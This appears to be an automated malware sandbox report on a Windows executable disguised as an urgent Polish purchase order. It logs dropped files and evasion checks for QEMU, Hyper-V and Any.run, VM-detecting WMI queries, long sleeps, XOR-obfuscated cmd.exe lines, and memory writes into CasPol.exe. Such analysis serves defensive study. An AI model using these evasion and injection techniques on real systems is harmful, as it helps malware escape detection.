            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: C:\Users\user\AppData\Local\Temp\nsgB1F9.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: C:\Users\user\AppData\Local\Temp\nsgB1F9.tmp\nsExec.dllJump to dropped file
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: C:\Users\user\Pacifisterne\Automatcafeer\Nedrustningspolitikken\Dilemmaers146\Glasgaibleanir\Nodebilledet\Microsoft.Practices.Composite.UnityExtensions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Mass process execution to delay analysis
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x19^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x05^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x07^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x78^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x79^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x08^75"
            Tries to detect Any.run
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000002.14099095140.000000000071D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXER
            Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000002.14099095140.0000000000700000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEP
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
            Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 372Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 372Thread sleep time: -600000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeDropped PE file which has not been started: C:\Users\user\Pacifisterne\Automatcafeer\Nedrustningspolitikken\Dilemmaers146\Glasgaibleanir\Nodebilledet\Microsoft.Practices.Composite.UnityExtensions.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 600000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 1890
            Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeCode function: 1_2_00405FFD FindFirstFileA,FindClose,
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeCode function: 1_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeCode function: 1_2_00402688 FindFirstFileA,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 600000
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeSystem information queried: ModuleInformation
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeAPI call chain: ExitProcess graph end node
            Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000002.14152791167.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000089.00000002.18029213795.0000000005269000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000002.14099095140.000000000071D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exer
            Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000002.14152791167.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000089.00000002.18029213795.0000000005269000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: CasPol.exe, 00000089.00000002.18029213795.0000000005269000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
            Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000002.14152791167.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000089.00000002.18029213795.0000000005269000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000002.14152791167.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000089.00000002.18029213795.0000000005269000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000002.14152791167.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000089.00000002.18029213795.0000000005269000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: CasPol.exe, 00000089.00000002.18029213795.0000000005269000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 00000089.00000002.18026950300.00000000037E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: CasPol.exe, 00000089.00000002.18026950300.000000000378B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
            Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000002.14152791167.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000089.00000002.18029213795.0000000005269000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000002.14099095140.0000000000700000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exep
            Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000002.14152791167.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000089.00000002.18029213795.0000000005269000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000002.14152791167.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000089.00000002.18029213795.0000000005269000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: CasPol.exe, 00000089.00000002.18029213795.0000000005269000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeCode function: 1_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeCode function: 1_2_00405050 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: E00000
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x19^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x05^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x07^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x78^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x79^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"
